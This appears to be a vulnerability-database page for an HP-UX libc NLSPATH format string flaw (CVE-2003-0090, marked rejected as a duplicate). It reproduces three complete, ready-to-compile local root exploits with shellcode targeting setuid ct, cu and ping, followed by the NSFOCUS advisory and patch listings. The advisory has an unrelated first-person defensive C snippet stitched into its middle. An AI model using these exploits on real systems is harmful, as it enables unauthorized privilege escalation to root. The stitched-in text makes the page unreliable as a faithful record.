CVE-2003-0090
CVSS: N/A
Published: 2003-12-15 00:00:00
Revised: 2008-09-10 15:17:53

[Original text] ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2000-0844. Reason: This candidate is a duplicate of CVE-2000-0844. Notes: All CVE users should reference CVE-2000-0844 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.


[CNNVD] CNNVD data not yet available.


[Machine translation] ** REJECT ** Do not use this candidate number.

- CVSS (base score)

CVSS not available

- CPE (affected platforms and products)

Product and version information (CPE) not available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0090
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0090
(official data source) NVD

- Other links and resources

- Vulnerability information (134)

HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit (EDBID:134)
Platform: hp-ux | Type: local | Published: 2003-12-16 (Verified) | Author: watercloud
/*******************************************************************************
*  File    : x_hp-ux11i_nls_ct.c
*  Usage   : cc x_hp-ux11i_nls_ct.c -o x_ct ; ./x_ct
*  Purpose : Get a local rootshell from /usr/bin/ct, using the HP-UX locale (message catalog) format string bug.
*  Author  : watercloud xfocus org 
*  Tested  : On HP-UX B11.11 .
******************************************************************************/


#include <stdio.h>
#include <stdlib.h>   /* exit(), system(), putenv() */
#include <string.h>   /* strlen() */
#include <unistd.h>   /* execl(), unlink() */

#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"

#define CMD  "/usr/bin/ct abc_ "
#define MSG "\$set 1\n1128 "
#define PRT_ARG_NUM 2    
#define STACK_LEN 0x180  

#define ENV_BEGIN 0x40   
#define ENV_LEN   0x40  
#define LOW_STACK 0x210  

char buffer[512];
char buff[72]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0;      
unsigned int dstaddr = 0;    

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
    unsigned int * pa = (unsigned int*)env;
    FILE * fp = NULL;
    int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;  

    int alig1= ENV_BEGIN - xnum*8;
    int alig2=0;
    int i=0;

    while(*pa != NULL)    
        *pa++=0;
    
    if(strlen(CMD) >ENV_BEGIN-3)
    {
        printf("No enough space to alig our env!\n");
        exit(1);
    }

	printf("Exploite for HP-UX 11i NLS format bug by command ct.\n");
	printf("From watercloud@xfocus.org.  2003-1-4\n");
	printf("   Site : http://www.xfocus.net (CN).\n");
	printf("   Site : http://www.xfocus.org (EN).\n");


    haddr = (unsigned int)&fp & 0xffff0000;
    if(alig1 < 0)
      alig1+=0x10000;
    alig2 = (haddr >> 16) - alig1 -xnum*8 ;
    if(alig2 < 0)
      alig2+=0x10000;

    dstaddr= haddr+ LOW_STACK + STACK_LEN -24;  
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint = 0;
    
    /* begin to make our .cat file */
    fp = fopen("/tmp/.ex.k","w");
    if(fp == NULL)
    {
      printf("open file : /tmp/.ex.k for write error.\n");
      exit(1);
    }
    fprintf(fp,"%s",MSG);
    for(;i<xnum;i++)
      fprintf(fp,"%%.8x");
    fprintf(fp,"%%.%ix%%n",alig1);
    fprintf(fp,"%%.%ix%%hn",alig2);
    fclose(fp);
    fp = NULL;
    system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
    unlink("/tmp/.ex.k");


    sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
    putenv(buffer);
    putenv(PATH);
    putenv(TERM);
    putenv(NLSPATH);
    
    printf("记得删除这个临时文件(Remember to delete the  file): /tmp/.ex.cat .\n");
    execl("/usr/bin/ct","/usr/bin/ct","abc_",0);   /* the show begins :) */
} 


// milw0rm.com [2003-12-16]

- Vulnerability information (23341)

HP-UX 10/11 NLSPATH Environment Variable Format String Vulnerability (1) (EDBID:23341)
Platform: hp-ux | Type: local | Published: 2003-04-01 (Verified) | Author: watercloud
source: http://www.securityfocus.com/bid/8985/info

HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges.

/*********************************************************************************************
*  Name    : x_hpux_11i_nls_cu.c
*  Usage   : cc x_hpux_11i_nls_cu.c -o x_cu ; ./x_cu
*  Purpose :
*    Get local rootshell from /usr/bin/cu using the HPUX locale (message catalog) format string bug.
*  Author  : watercloud 
*  Date    : 2003-1-4
*  Tested  : On HP-UX B11.11
*  Note    : Use at your own risk! 
*********************************************************************************************/
#include <stdio.h>
#include <stdlib.h>   /* exit(), system(), putenv() */
#include <string.h>   /* strlen() */
#include <unistd.h>   /* execl(), unlink() */

#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"

#define CMD  "/usr/bin/cu abc_ "
#define MSG "\$set 1\n32 "
#define PRT_ARG_NUM 2    /* xprintf([x1],[x2],"fm" . .) x1 and x2 all exists eq 3  */
#define STACK_LEN 0x1c0  /* The space of caller-fprintf to main function stack offset  */

#define ENV_BEGIN 0x40   /* Our buffer put in TZ ENV's begin address */
#define ENV_LEN   0x40   /* Our env len */
#define LOW_STACK 0x210  /* Our's main stack begin addr, for all program because our env len :) */

char buffer[512];
char buff[72]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0;      /* high 16 bits of the stack address  */
unsigned int dstaddr = 0;    /* fprintf's return addr is stored here */

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
	unsigned int * pa = (unsigned int*)env;
	FILE * fp = NULL;
	int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;  /* the number of %.8x */
	int alig1= ENV_BEGIN - xnum*8;
	int alig2=0;
	int i=0;

	while(*pa != NULL)         /* clean all env */
		*pa++=0;
	
	if(strlen(CMD) >ENV_BEGIN-3)
	{
		printf("No enough space to alig our env!\n");
		exit(1);
	}

	haddr = (unsigned int)&fp & 0xffff0000;
	if(alig1 < 0)
	  alig1+=0x10000;
	alig2 = (haddr >> 16) - alig1 -xnum*8 ;
	if(alig2 < 0)
	  alig2+=0x10000;

	dstaddr= haddr+ LOW_STACK + STACK_LEN -24;   /* fprintf's return addr stored here */ 
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint = 0;
	
	/* begin to make our .cat file */
	fp = fopen("/tmp/.ex.k","w");
	if(fp == NULL)
	{
	  printf("open file : /tmp/.ex.k for write error.\n");
	  exit(1);
	}
	fprintf(fp,"%s",MSG);
	for(;i<xnum;i++)
	  fprintf(fp,"%%.8x");
	fprintf(fp,"%%.%ix%%n",alig1);
	fprintf(fp,"%%.%ix%%hn",alig2);
	fclose(fp);
	fp = NULL;
	system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
	unlink("/tmp/.ex.k");
	/* end make our .cat file */

	/* put our env,store our shellcode and address info . . . and so on */
	sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
	putenv(buffer);
	putenv(PATH);
	putenv(TERM);
	putenv(NLSPATH);
	
	printf("记得删除这个临时文件(Remember to delete the  file): /tmp/.ex.cat .\n");
	execl("/usr/bin/cu","/usr/bin/cu","abc_",0);   /* the show begins :) */
}		

- Vulnerability information (23342)

HP-UX 10/11 NLSPATH Environment Variable Format String Vulnerability (2) (EDBID:23342)
Platform: hp-ux | Type: local | Published: 2003-04-01 (Verified) | Author: watercloud
source: http://www.securityfocus.com/bid/8985/info
 
HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges.

/*********************************************************************************************
*  Name    : x_hpux_11i_nls_ping.c
*  Usage   : cc x_hpux_11i_nls_ping.c -o x_ping ; ./x_ping
*  Purpose :
*    Get local rootshell from /usr/sbin/ping using the HPUX locale (message catalog) format string bug.
*  Author  : watercloud 
*  Date    : 2003-1-4
*  Tested  : On HP-UX B11.11
*  Note    : Use at your own risk! 
*********************************************************************************************/
#include <stdio.h>
#include <stdlib.h>   /* exit(), system(), putenv() */
#include <string.h>   /* strlen() */
#include <unistd.h>   /* execl(), unlink() */

#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"

#define CMD  "/usr/sbin/ping abc_ "
#define MSG "\$set 1\n2 "
#define PRT_ARG_NUM 1    /* xprintf([x1],[x2],"fm" . .) x1 and x2 all exists eq 3  */
#define STACK_LEN 0x140  /* The space of caller-fprintf to main function stack offset  */

#define ENV_BEGIN 0x40   /* Our buffer put in TZ ENV's begin address */
#define ENV_LEN   0x40   /* Our env len */
#define LOW_STACK 0x210  /* Our's main stack begin addr, for all program because our env len :) */

char buffer[512];
char buff[72]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0;      /* high 16 bits of the stack address  */
unsigned int dstaddr = 0;    /* fprintf's return addr is stored here */

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
	unsigned int * pa = (unsigned int*)env;
	FILE * fp = NULL;
	int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;  /* the number of %.8x */
	int alig1= ENV_BEGIN - xnum*8;
	int alig2=0;
	int i=0;

	while(*pa != NULL)         /* clean all env */
		*pa++=0;
	
	if(strlen(CMD) >ENV_BEGIN-3)
	{
		printf("No enough space to alig our env!\n");
		exit(1);
	}

	haddr = (unsigned int)&fp & 0xffff0000;
	if(alig1 < 0)
	  alig1+=0x10000;
	alig2 = (haddr >> 16) - alig1 -xnum*8 ;
	if(alig2 < 0)
	  alig2+=0x10000;

	dstaddr= haddr+ LOW_STACK + STACK_LEN -24;   /* fprintf's return addr stored here */ 
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint = 0;
	
	/* begin to make our .cat file */
	fp = fopen("/tmp/.ex.k","w");
	if(fp == NULL)
	{
	  printf("open file : /tmp/.ex.k for write error.\n");
	  exit(1);
	}
	fprintf(fp,"%s",MSG);
	for(;i<xnum;i++)
	  fprintf(fp,"%%.8x");
	fprintf(fp,"%%.%ix%%n",alig1);
	fprintf(fp,"%%.%ix%%hn",alig2);
	fclose(fp);
	fp = NULL;
	system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
	unlink("/tmp/.ex.k");
	/* end make our .cat file */

	/* put our env,store our shellcode and address info . . . and so on */
	sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
	putenv(buffer);
	putenv(PATH);
	putenv(TERM);
	putenv(NLSPATH);
	
	printf("记得删除这个临时文件(Remember to delete the  file): /tmp/.ex.cat .\n");
	execl("/usr/sbin/ping","/usr/sbin/ping","abc_",0);   /* the show begins :) */
}

- Vulnerability information (F32179)

sa2003-08.txt (PacketStormID:F32179)
Posted: 2003-11-14 00:00:00 | Author: NSFOCUS (nsfocus.com)
Tags: advisory, local, root | Platform: hpux | CVE-2003-0090

NSFOCUS Security Advisory SA2003-08 - Due to a lack of input validation on the NLSPATH variable, libc on HP-UX is susceptible to a format string vulnerability that allows a local attacker to gain root privileges.

NSFOCUS Security Advisory(SA2003-08)

Topic: HP-UX libc NLSPATH Environment Variable Privilege Elevation Vulnerability

Release Date: 2003-11-13

CVE CAN ID: CAN-2003-0090

http://www.nsfocus.com/english/homepage/research/0308.htm

Affected system:
===================
- HP-UX B.11.00
- HP-UX B.11.11

Summary:
=========

NSFOCUS Security Team has found that libc in HP-UX does not restrict the
NLSPATH variable for suid root programs, which leads to a format string
vulnerability. By exploiting it, a local attacker could gain root
privileges.

Description:
============

Many programs in HP-UX use catopen()/catgets() and other libc functions to
display localized messages. When catopen() finds the environment variable
NLSPATH set, it opens the file specified there and reads messages from it.

However, catopen() does not prevent suid root programs from honouring
NLSPATH, so a local attacker can set NLSPATH to point at a message catalog
crafted by themselves. When the suid root program opens that catalog with
catopen() and passes a message from it to *printf() as the format string,
the result is a format string vulnerability.

Any suid root program that uses catopen()/catgets() may be vulnerable. By
exploiting the vulnerability, local attackers could gain root privileges.
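As an added example, not part of the advisory or of the exploits above: a defensive check that a catgets() caller can apply before handing a catalog message to *printf(), plus the privilege test under which a program should not honour NLSPATH at all. The function names are mine, and the sample formats in the comments and test are constructed.

```c
#include <string.h>
#include <unistd.h>

/* Collect the conversion characters of a printf-style format into out,
 * e.g. "%s: %d" -> "sd". Flags, width, precision and h/l/L/q/j/z/t length
 * modifiers are skipped and "%%" is not a conversion. Returns the number of
 * conversions, or -1 for %n, "%*d", positional "%1$s" or unknown conversions,
 * none of which belongs in a message catalog entry. */
static int conversion_chars(const char *fmt, char *out, size_t outlen)
{
    size_t n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;                          /* literal percent sign */
        while (*p && strchr("-+ #0", *p))      /* flags */
            p++;
        while (*p >= '0' && *p <= '9')         /* width */
            p++;
        if (*p == '.')                         /* precision */
            for (p++; *p >= '0' && *p <= '9'; p++)
                ;
        while (*p && strchr("hlLqjzt", *p))    /* length modifiers */
            p++;
        if (!*p || !strchr("diouxXeEfgGcsp", *p) || n + 1 >= outlen)
            return -1;                         /* %n, %*d, %1$s, garbage */
        out[n++] = *p;
    }
    out[n] = '\0';
    return (int)n;
}

/* Use a catalog message as a format only when its conversions match the
 * program's compiled-in default exactly; otherwise keep the default. This is
 * the check to run on a catgets() result before it reaches printf(). */
const char *safe_catalog_format(const char *dflt, const char *msg)
{
    char want[32], got[32];
    if (conversion_chars(dflt, want, sizeof want) < 0)
        return dflt;
    if (conversion_chars(msg, got, sizeof got) < 0 || strcmp(want, got) != 0)
        return dflt;
    return msg;
}

/* Environment that redirects catalog lookup (NLSPATH) is only trustworthy
 * when the process holds no privilege its invoker lacks; a setuid or setgid
 * program should ignore it otherwise. */
int catalog_env_trusted(void)
{
    return getuid() == geteuid() && getgid() == getegid();
}
```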

According to our tests, at least the following programs are vulnerable:

-r-sr-xr-x   1 root       bin          45056 Nov 14  2000 /usr/bin/at
-r-sr-xr-x   1 root       bin          24576 Nov 14  2000 /usr/bin/crontab
-r-sr-xr-x   1 root       bin          45056 Nov 14  2000 /usr/bin/ct
-r-sr-xr-x   1 root       bin          36864 Apr 19  2001 /usr/bin/cu
-r-sr-xr-x   1 root       bin          20480 Nov 14  2000 /usr/lbin/exrecover
-r-sr-xr-x   1 root       bin          40960 Aug 16  2001 /usr/bin/lp
-r-sr-sr-x   2 root       mail         45056 Nov 14  2000 /usr/bin/mail
-r-sr-xr-x   5 root       bin          45056 Nov 14  2000 /usr/bin/passwd
-r-sr-xr-x   1 root       bin          24576 Nov 14  2000 /usr/bin/su
-r-sr-xr-x  11 root       bin        1921024 Nov  6  2001 /usr/sbin/swinstall
-r-sr-xr-x   2 root       bin        1028096 Nov  6  2001 /usr/sbin/swpackage

Workaround:
=============

NSFOCUS suggests temporarily removing the suid root bit from all the affected
programs. However, this may cause considerable inconvenience, so you are
advised to apply the appropriate patch as early as possible.

Vendor Status:
==============

2002.11.19 Informed the vendor
2002.12.05 Vendor confirmed the vulnerability
2003.11.05 Vendor released a security bulletin (HPSBUX0311-294) and the
            corresponding patches for the vulnerability.

Detailed information for the HP security bulletin is available at:
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0311-294

Note: Valid ITRC account is required for the link above.

Patch ID:

HP-UX B.11.22 PHCO_29329
HP-UX B.11.11 PHCO_29495
HP-UX B.11.00 PHCO_29284
HP-UX B.10.20 PHCO_26158

Additional Information:
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2003-0090 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems. Candidates may change significantly before they become official
CVE entries.

Acknowledgment
===============

Yang Jilong of NSFOCUS Security Team found the vulnerability.

DISCLAIMER:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 aF6DA

- Vulnerability information

2782
HP-UX NLSPATH Local Privilege Escalation
Exploit: Public | Vendor Verified

- Vulnerability description

HP-UX contains a flaw that allows malicious users to gain root privileges. The issue is due to the fact that root can't restrict the paths set in the "NLSPATH" environment variable for SUID programs. Any program on the system that is SUID and uses the "catopen()" function can be exploited to open a specially created file, which results in a format string vulnerability.

- Timeline

2003-11-07 2002-11-19
Unknown 2002-11-05

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Hewlett-Packard has released a patch to address this vulnerability:

Version / Patch #
B.11.22 / PHCO_29329
B.11.11 / PHCO_29495
B.11.00 / PHCO_29284
B.10.20 / PHCO_26158

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

HP-UX NLSPATH Environment Variable Format String Vulnerability
Class: Design Error | Bugtraq ID: 8985
Remote: No | Local: Yes
Published: 2003-11-05 12:00:00 | Updated: 2009-07-12 12:56:00
Discovery is credited to NSFocus.

- Affected program versions

HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20

- Vulnerability discussion

HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges.

- Exploit

The following proof of concept exploit was supplied by watercloud@xfocus.org:

- Solution

HP has released a revised advisory (SSRT3656) and the following patches to address this issue:

HP HP-UX 10.20
HP HP-UX 11.0
HP HP-UX 11.0 4
HP HP-UX 11.11
HP HP-UX 11.22

- References